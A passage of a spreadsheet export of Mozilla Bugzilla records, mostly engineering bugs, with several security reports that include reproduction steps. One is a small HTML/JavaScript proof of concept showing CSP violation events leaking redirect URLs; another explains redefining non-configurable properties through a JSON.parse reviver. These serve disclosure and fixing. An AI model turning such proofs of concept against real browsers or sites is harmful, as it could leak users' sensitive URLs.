In trying to figure out why I was getting massive piles of hazards when I fixed the isSuppressConstructor annotation, I eventually got down to this stack:
    void js::ReportOutOfMemory(ExclusiveContext*)
    jscntxt.cpp:void PopulateReportBlame(JSContext*, JSErrorReport*)
    void js::NonBuiltinFrameIter::NonBuiltinFrameIter(JSContext*, JSPrincipals*)
    void js::NonBuiltinFrameIter::NonBuiltinFrameIter(JSContext*, JSPrincipals*)
    void js::NonBuiltinFrameIter::settle()
    js::FrameIter* js::FrameIter::operator++()
    void js::FrameIter::popInterpreterFrame()
    void js::FrameIter::popActivation()
    void js::FrameIter::settleOnActivation()
    IndirectCall: subsumes
I'm not totally sure that subsumes can actually GC, but I thought I tracked it through once and I had a lot of trouble proving that it couldn't. If it did GC, then it would be Bad, because ReportOOM is called by malloc() and it would really really be better if malloc did not GC.
ReportOOM suppresses GC in other areas, so it should suppress on this path too unless we can prove that this is a false positive.
Oh, hm. nsIPrincipal seems to be scriptable, including subsumes(). Oh dear.</t>
        </is>
      </c>
      <c r="X5297" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5298">
      <c r="A5298" t="n">
        <v>1528508</v>
      </c>
      <c r="B5298" t="inlineStr">
        <is>
          <t>2019-02-16 10:05:38 -0800</t>
        </is>
      </c>
      <c r="C5298" t="inlineStr">
        <is>
          <t>[Automated review] "caretline" in coverity analyses</t>
        </is>
      </c>
      <c r="D5298" t="inlineStr">
        <is>
          <t>2022-08-17 14:01:35 -0700</t>
        </is>
      </c>
      <c r="E5298" t="n">
        <v>1</v>
      </c>
      <c r="F5298" t="n">
        <v>1</v>
      </c>
      <c r="G5298" t="n">
        <v>7</v>
      </c>
      <c r="H5298" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5298" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J5298" t="inlineStr">
        <is>
          <t>Source Code Analysis</t>
        </is>
      </c>
      <c r="K5298" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5298" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5298" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5298" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5298" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5298" t="inlineStr"/>
      <c r="Q5298" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5298" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5298" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5298" t="n">
        <v>1</v>
      </c>
      <c r="U5298" t="n">
        <v>0</v>
      </c>
      <c r="V5298" t="n">
        <v>4</v>
      </c>
      <c r="W5298" t="inlineStr">
        <is>
          <t>**Phabricator URL:** https://phabricator.services.mozilla.com/D19777#528110
The review comment says:
```use of undeclared identifier 'aPrefix'
The path that leads to this defect is:
    extensions/cookie/nsPermissionManager.cpp:2700:
        err_undeclared_var_use: use of undeclared identifier 'aPrefix'.
    extensions/cookie/nsPermissionManager.cpp:2700:
        caretline:                              ^.
```
The last line doesn't really make sense to me...</t>
        </is>
      </c>
      <c r="X5298" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5299">
      <c r="A5299" t="n">
        <v>1868901</v>
      </c>
      <c r="B5299" t="inlineStr">
        <is>
          <t>2023-12-07 14:37:49 -0800</t>
        </is>
      </c>
      <c r="C5299" t="inlineStr">
        <is>
          <t>Undefined behavior in ShutdownObserver()</t>
        </is>
      </c>
      <c r="D5299" t="inlineStr">
        <is>
          <t>2024-05-30 11:16:59 -0700</t>
        </is>
      </c>
      <c r="E5299" t="n">
        <v>1</v>
      </c>
      <c r="F5299" t="n">
        <v>1</v>
      </c>
      <c r="G5299" t="n">
        <v>3</v>
      </c>
      <c r="H5299" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5299" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5299" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K5299" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5299" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5299" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5299" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5299" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5299" t="inlineStr">
        <is>
          <t>[adv-main121+][adv-esr115.6+]</t>
        </is>
      </c>
      <c r="Q5299" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5299" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5299" t="inlineStr">
        <is>
          <t>122 Branch</t>
        </is>
      </c>
      <c r="T5299" t="n">
        <v>1</v>
      </c>
      <c r="U5299" t="n">
        <v>0</v>
      </c>
      <c r="V5299" t="n">
        <v>14</v>
      </c>
      <c r="W5299" t="inlineStr">
        <is>
          <t>`ShutdownObserver` (`widget/GfxInfoBase.cpp`) invokes undefined behavior by deleting an object whose static type lacks a virtual destructor, where the object has a derived-class dynamic type. [1]
The issue concerns the three arrays in `widget/GfxDriverInfo.h` (line numbers are from trunk):
```
    351: static nsAString* sWindowProtocol[static_cast&lt;size_t&gt;(WindowProtocol::Max)];
    ...
    355: static nsAString* sDeviceVendors[static_cast&lt;size_t&gt;(DeviceVendor::Max)];
    ...
    358: static nsAString* sDriverVendors[static_cast&lt;size_t&gt;(DriverVendor::Max)];
```
These arrays' elements are assigned `nsString*` pointers by `GfxDriverInfo::GetWindowProtocol()`, `GfxDriverInfo::GetDeviceVendor()`, and `GfxDriverInfo::GetDriverVendor()`, respectively, e.g. from `widget/GfxDriverInfo.cpp`:
```
    602: const nsAString&amp; GfxDriverInfo::GetWindowProtocol(WindowProtocol id) {
    ...
    613:  sWindowProtocol[idx] = new nsString();
```
and are deleted by `ShutdownObserver::Observe()` (`widget/GfxInfoBase.cpp`):
```
71: NS_IMETHOD Observe(nsISupports* subject, const char* aTopic,
72:                     const char16_t* aData) override {
...
83:    for (auto&amp; windowProtocol : GfxDriverInfo::sWindowProtocol) {
84:      delete windowProtocol;
85:      windowProtocol = nullptr;
86:    }
87:
88:    for (auto&amp; deviceVendor : GfxDriverInfo::sDeviceVendors) {
89:      delete deviceVendor;
90:      deviceVendor = nullptr;
91:    }
92:
93:    for (auto&amp; driverVendor : GfxDriverInfo::sDriverVendors) {
94:      delete driverVendor;
95:      driverVendor = nullptr;
96:    }
```
But `nsString` is an alias for `nsTString&lt;char16_t&gt;`, which isa `nsTSubstring&lt;char16_t&gt;`. Whereas, `nsAString` is an alias for `nsTSubstring&lt;char16_t&gt;`. So the assignment is of a derived class pointer to a base class pointer. But the base class `nsTSubstring&lt;char16_t&gt;` lacks a virtual destructor, despite the quizzical comment from `xpcom/string/nsTSubstring.h`:
```
    325:  // this acts like a virtual destructor
    326:  ~nsTSubstring() { Finalize(); }
```
[1] See C++ 20 Standard (n4750) s.8.5.2.5(3) : "In a single-object delete expression, if the static type of the object to be deleted is different from its dynamic type, the static type shall be a base class of the dynamic type of the object to be deleted and the static type shall have a virtual destructor or the behavior is undefined."</t>
        </is>
      </c>
      <c r="X5299" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5300">
      <c r="A5300" t="n">
        <v>708825</v>
      </c>
      <c r="B5300" t="inlineStr">
        <is>
          <t>2011-12-08 13:36:43 -0800</t>
        </is>
      </c>
      <c r="C5300" t="inlineStr">
        <is>
          <t>"ASSERTION: Fault in cycle collector: traversed refs exceed refcount" closing window nearScriptStackLimit</t>
        </is>
      </c>
      <c r="D5300" t="inlineStr">
        <is>
          <t>2012-05-22 02:47:08 -0700</t>
        </is>
      </c>
      <c r="E5300" t="n">
        <v>1</v>
      </c>
      <c r="F5300" t="n">
        <v>1</v>
      </c>
      <c r="G5300" t="n">
        <v>3</v>
      </c>
      <c r="H5300" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5300" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5300" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K5300" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5300" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5300" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5300" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5300" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5300" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q5300" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5300" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5300" t="inlineStr">
        <is>
          <t>mozilla12</t>
        </is>
      </c>
      <c r="T5300" t="n">
        <v>1</v>
      </c>
      <c r="U5300" t="n">
        <v>0</v>
      </c>
      <c r="V5300" t="n">
        <v>38</v>
      </c>
      <c r="W5300" t="inlineStr">
        <is>
          <t>Created attachment 580173
testcase
1. Load the testcase
2. Click the button
3. Close the testcase
4. Force a CC (e.g. by quitting Firefox or using about:memory)
Result:
###!!! ASSERTION: Fault in cycle collector: traversed refs exceed refcount (ptr: 127319dc0)
: 'Not Reached', file /Users/jruderman/trees/mozilla-central/xpcom/base/nsCycleCollector.cpp, line 1235
In addition, everything leaks.
I can reproduce with both Tinderbox debug builds and a local debug build (Mac OS X 10.6, 64-bit Firefox).
Some variants crash instead, in exploitable-looking ways.</t>
        </is>
      </c>
      <c r="X5300" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5301">
      <c r="A5301" t="n">
        <v>407672</v>
      </c>
      <c r="B5301" t="inlineStr">
        <is>
          <t>2007-12-10 02:02:34 -0800</t>
        </is>
      </c>
      <c r="C5301" t="inlineStr">
        <is>
          <t>upgrade staging-build-console to firefox 2.0.0.11</t>
        </is>
      </c>
      <c r="D5301" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5301" t="n">
        <v>1</v>
      </c>
      <c r="F5301" t="n">
        <v>1</v>
      </c>
      <c r="G5301" t="n">
        <v>5</v>
      </c>
      <c r="H5301" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5301" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5301" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5301" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5301" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5301" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5301" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5301" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5301" t="inlineStr"/>
      <c r="Q5301" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5301" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5301" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5301" t="n">
        <v>1</v>
      </c>
      <c r="U5301" t="n">
        <v>0</v>
      </c>
      <c r="V5301" t="n">
        <v>6</v>
      </c>
      <c r="W5301" t="inlineStr">
        <is>
          <t>The staging release automation server runs nightly tests against 2.0.0.7, it should be using 2.0.0.11
This requires some local changes as per:
http://wiki.mozilla.org/Build:Release_Automation#Updating_Staging_release_version
I'll take this, as I'm currently using staging-build-console to test bug 401936 but should be done soon.</t>
        </is>
      </c>
      <c r="X5301" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5302">
      <c r="A5302" t="n">
        <v>1105914</v>
      </c>
      <c r="B5302" t="inlineStr">
        <is>
          <t>2014-11-27 19:37:12 -0800</t>
        </is>
      </c>
      <c r="C5302" t="inlineStr">
        <is>
          <t>JSON.parse with reviver allows redefining non-configurable properties</t>
        </is>
      </c>
      <c r="D5302" t="inlineStr">
        <is>
          <t>2024-05-30 08:38:35 -0700</t>
        </is>
      </c>
      <c r="E5302" t="n">
        <v>1</v>
      </c>
      <c r="F5302" t="n">
        <v>1</v>
      </c>
      <c r="G5302" t="n">
        <v>3</v>
      </c>
      <c r="H5302" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5302" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5302" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5302" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5302" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5302" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5302" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5302" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5302" t="inlineStr">
        <is>
          <t>[reporter-external][adv-main40+]</t>
        </is>
      </c>
      <c r="Q5302" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5302" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5302" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T5302" t="n">
        <v>1</v>
      </c>
      <c r="U5302" t="n">
        <v>0</v>
      </c>
      <c r="V5302" t="n">
        <v>22</v>
      </c>
      <c r="W5302" t="inlineStr">
        <is>
          <t>Created attachment 8530046
Testcase: look at your web console
Credit for this one also to André Bargull.
The implementation of Walk() in json.cpp (used when there is a reviver) uses JSObject::defineGeneric to define the property.  This is not what the spec says to do, and in particular it's missing the various sanity checks that [[DefineOwnProperty]] is supposed to perform.  Compare to what Object.defineProperty does (which lands in DefinePropertyOnObject, which does those checks).
Anyway, the upshot is that you can redefine non-configurable properties.  André's testcase does this with Location, redefining things like toString.
This particular testcase is "fixed" by my patch in bug 1101123, in that before you get to toString you try to redefine "href", which is an accessor property so you get an exception.  Except per spec failures to define a prop during Walk shouldn't throw afaict, and I'm sure the testcase could be adjusted to avoid the href issue.... and in any case, this can be used to redefine non-configurable stuff on objects which only have value props no matter what I do in bug 1101123.</t>
        </is>
      </c>
      <c r="X5302" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5303">
      <c r="A5303" t="n">
        <v>1542194</v>
      </c>
      <c r="B5303" t="inlineStr">
        <is>
          <t>2019-04-05 05:09:21 -0700</t>
        </is>
      </c>
      <c r="C5303" t="inlineStr">
        <is>
          <t>CSP violation information contains URL of redirect started from client-side code</t>
        </is>
      </c>
      <c r="D5303" t="inlineStr">
        <is>
          <t>2024-05-30 09:58:03 -0700</t>
        </is>
      </c>
      <c r="E5303" t="n">
        <v>1</v>
      </c>
      <c r="F5303" t="n">
        <v>1</v>
      </c>
      <c r="G5303" t="n">
        <v>3</v>
      </c>
      <c r="H5303" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5303" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5303" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K5303" t="inlineStr">
        <is>
          <t>68 Branch</t>
        </is>
      </c>
      <c r="L5303" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5303" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5303" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5303" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5303" t="inlineStr">
        <is>
          <t>[domsecurity-active][sec-survey][adv-main86+][adv-esr78.8+]</t>
        </is>
      </c>
      <c r="Q5303" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5303" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5303" t="inlineStr">
        <is>
          <t>87 Branch</t>
        </is>
      </c>
      <c r="T5303" t="n">
        <v>1</v>
      </c>
      <c r="U5303" t="n">
        <v>0</v>
      </c>
      <c r="V5303" t="n">
        <v>33</v>
      </c>
      <c r="W5303" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Steps to reproduce:
1. Navigate to https://l0.cm/fx_csp_violation_leak.html . This page has the following CSP and CSP violation event listener:
```html
&lt;meta http-equiv="Content-Security-Policy" content="default-src 'self' 'unsafe-inline' vulnerabledoma.in"&gt;
```
```js
document.addEventListener('securitypolicyviolation', e =&gt; {
        console.dir(e);
        alert(e.blockedURI);
    });
```
In addition, there are three buttons to embed other origin's pages into an iframe. These buttons are for testing the following cases.
TEST 1: Navigate to domain not allowed by CSP via 302 redirect
TEST 2: Navigate to domain not allowed by CSP via JavaScript
TEST 3: Navigate to domain not allowed by CSP via link
2. Click on the "TEST 1" button. "https://vulnerabledoma.in/fx_csp_violation_leak_302.php" is popped up. (= Safe. I think this behavior comes from a fix of bug 1069762 )
3. Click on the "TEST 2" button. "https://www.vulnerabledoma.in/path?query" is popped up. (= leak of redirect URL )
4. Click on the "TEST 3" button and then click on the displayed link. "https://www.vulnerabledoma.in/path?query" is popped up. (= leak of redirect URL )
For your information, also the behavior of "TEST 1" is different from other browsers. Other browsers return "https://www.vulnerabledoma.in". 
Actual results:
The CSP violation event object ( and CSP violation report ) contains the full redirect URL if the violation happens via a client-side navigation.
Expected results:
The CSP violation event object ( and CSP violation report ) should not contain the full redirect URL in the case of navigation started from a client-side code also. This is because the redirect URL might have sensitive information.</t>
        </is>
      </c>
      <c r="X5303" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5304">
      <c r="A5304" t="n">
        <v>746260</v>
      </c>
      <c r="B5304" t="inlineStr">
        <is>
          <t>2012-04-17 11:44:37 -0700</t>
        </is>
      </c>
      <c r="C5304" t="inlineStr">
        <is>
          <t>disable the screen resolution changing on android for jsreftest and crashtest, leave it on for reftest</t>
        </is>
      </c>
      <c r="D5304" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E5304" t="n">
        <v>1</v>
      </c>
      <c r="F5304" t="n">
        <v>1</v>
      </c>
      <c r="G5304" t="n">
        <v>5</v>
      </c>
      <c r="H5304" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5304" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5304" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5304" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5304" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M5304" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5304" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5304" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5304" t="inlineStr">
        <is>
          <t>[mobile] live</t>
        </is>
      </c>
      <c r="Q5304" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5304" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5304" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5304" t="n">
        <v>1</v>
      </c>
      <c r="U5304" t="n">
        <v>0</v>
      </c>
      <c r="V5304" t="n">
        <v>26</v>
      </c>
      <c r="W5304" t="inlineStr">
        <is>
          <t>the jsreftests and crashtests do not require us to compare canvas images that use 800x1000.  Right now in our sut_tools, we do a blanket resolution change for all reftest harness tests.</t>
        </is>
      </c>
      <c r="X5304" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5305">
      <c r="A5305" t="n">
        <v>518038</v>
      </c>
      <c r="B5305" t="inlineStr">
        <is>
          <t>2009-09-21 18:38:27 -0700</t>
        </is>
      </c>
      <c r="C5305" t="inlineStr">
        <is>
          <t>Update new AAQ form to add about:support paste location</t>
        </is>
      </c>
      <c r="D5305" t="inlineStr">
        <is>
          <t>2009-12-16 15:51:04 -0800</t>
        </is>
      </c>
      <c r="E5305" t="n">
        <v>1</v>
      </c>
      <c r="F5305" t="n">
        <v>1</v>
      </c>
      <c r="G5305" t="n">
        <v>5</v>
      </c>
      <c r="H5305" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5305" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5305" t="inlineStr">
        <is>
          <t>Forum</t>
        </is>
      </c>
      <c r="K5305" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5305" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5305" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5305" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5305" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5305" t="inlineStr">
        <is>
          <t>sumo_only</t>
        </is>
      </c>
      <c r="Q5305" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5305" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5305" t="inlineStr">
        <is>
          <t>1.4.1</t>
        </is>
      </c>
      <c r="T5305" t="n">
        <v>1</v>
      </c>
      <c r="U5305" t="n">
        <v>0</v>
      </c>
      <c r="V5305" t="n">
        <v>20</v>
      </c>
      <c r="W5305" t="inlineStr">
        <is>
          <t>Right now the form has nowhere to paste about:support (coming in Firefox 3.6) in a way that will collapse on a new thread.</t>
        </is>
      </c>
      <c r="X5305" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5306">
      <c r="A5306" t="n">
        <v>491134</v>
      </c>
      <c r="B5306" t="inlineStr">
        <is>
          <t>2009-05-02 10:48:59 -0700</t>
        </is>
      </c>
      <c r="C5306" t="inlineStr">
        <is>
          <t>nsDOMOfflineResourceList uses its own (unsafe) way to dispatch events</t>
        </is>
      </c>
      <c r="D5306" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E5306" t="n">
        <v>1</v>
      </c>
      <c r="F5306" t="n">
        <v>1</v>
      </c>
      <c r="G5306" t="n">
        <v>3</v>
      </c>
      <c r="H5306" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5306" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5306" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5306" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5306" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5306" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5306" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5306" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5306" t="inlineStr">
        <is>
          <t xml:space="preserve">[sg:high?] </t>
        </is>
      </c>
      <c r="Q5306" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5306" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5306" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5306" t="n">
        <v>1</v>
      </c>
      <c r="U5306" t="n">
        <v>0</v>
      </c>
      <c r="V5306" t="n">
        <v>24</v>
      </c>
      <c r="W5306" t="inlineStr">
        <is>
          <t>nsDOMOfflineResourceList pushes context to stack before iterating
event listeners and pops it later. But it does not check if event listener
killed cx or anything like that. I believe this may lead to similar problems 
as what XHR had in Bug 460002.
I'll make nsDOMOfflineResourceList to work like any other event target, but
for branches some other fix is needed.</t>
        </is>
      </c>
      <c r="X5306" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5307">
      <c r="A5307" t="n">
        <v>278148</v>
      </c>
      <c r="B5307" t="inlineStr">
        <is>
          <t>2005-01-12 14:39:55 -0800</t>
        </is>
      </c>
      <c r="C5307" t="inlineStr">
        <is>
          <t>checksetup.pl *still* errors when trying to drop index on milestones table</t>
        </is>
      </c>
      <c r="D5307" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:42 -0800</t>
        </is>
      </c>
      <c r="E5307" t="n">
        <v>1</v>
      </c>
      <c r="F5307" t="n">
        <v>1</v>
      </c>
      <c r="G5307" t="n">
        <v>4</v>
      </c>
      <c r="H5307" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5307" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5307" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K5307" t="inlineStr">
        <is>
          <t>2.18</t>
        </is>
      </c>
      <c r="L5307" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5307" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5307" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5307" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5307" t="inlineStr"/>
      <c r="Q5307" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5307" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5307" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T5307" t="n">
        <v>1</v>
      </c>
      <c r="U5307" t="n">
        <v>0</v>
      </c>
      <c r="V5307" t="n">
        <v>10</v>
      </c>
      <c r="W5307" t="inlineStr">
        <is>
          <t>Two bugs have already been filed on this issue: bug 244756, and bug 277303. 
Unfortunately, while the patches on both were reviewed and approved, neither 
one actually works. :(
With the latest patch from bug 277303 applied, I get the following output from 
checksetup.pl:
Fixing Indexes and Uniqueness.
DBD::mysql::st execute failed: You have an error in your SQL syntax 
near 'PRIMARY' at line 1 at ./checksetup.pl line 2321.
DBD::mysql::st fetchrow_arrayref failed: You have an error in your SQL syntax 
near 'PRIMARY' at line 1 at ./checksetup.pl line 2312.
The reason for this is that DropIndexes makes no allowance for the idea that it 
may ever have to drop a PRIMARY key. To do so requires this syntax:
   ALTER TABLE milestones DROP PRIMARY KEY
Perusal of the code in DropIndexes shows that it can only produce the following 
syntax:
   ALTER TABLE milestones DROP INDEX PRIMARY
There are two approaches to fixing this: either fix DropIndexes so that it 
handles PRIMARY key drops properly, or just add the above line with the correct 
syntax in place of the DropIndexes call. The former is 'better', the latter 
is 'faster'... and at this particular moment, with 2.18 release so near, speed 
may be more important.</t>
        </is>
      </c>
      <c r="X5307" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5308">
      <c r="A5308" t="n">
        <v>201370</v>
      </c>
      <c r="B5308" t="inlineStr">
        <is>
          <t>2003-04-09 11:21:21 -0700</t>
        </is>
      </c>
      <c r="C5308" t="inlineStr">
        <is>
          <t>TLS intolerance detection broken</t>
        </is>
      </c>
      <c r="D5308" t="inlineStr">
        <is>
          <t>2003-04-24 13:28:50 -0700</t>
        </is>
      </c>
      <c r="E5308" t="n">
        <v>1</v>
      </c>
      <c r="F5308" t="n">
        <v>1</v>
      </c>
      <c r="G5308" t="n">
        <v>3</v>
      </c>
      <c r="H5308" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5308" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5308" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K5308" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5308" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5308" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5308" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5308" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5308" t="inlineStr"/>
      <c r="Q5308" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5308" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5308" t="inlineStr">
        <is>
          <t>mozilla1.4beta</t>
        </is>
      </c>
      <c r="T5308" t="n">
        <v>1</v>
      </c>
      <c r="U5308" t="n">
        <v>0</v>
      </c>
      <c r="V5308" t="n">
        <v>6</v>
      </c>
      <c r="W5308" t="inlineStr">
        <is>
          <t>edit/prefs/privacy/ssl:
  make sure SSL2, SSL3, TLS are all enabled
Go to
  https://webmail.wittenberg.edu
With Mozilla 1.2: 
  works
  (You can watch the statusbar to see that Mozilla
   tries to connect twice, caused by the TLS intolerance detection)
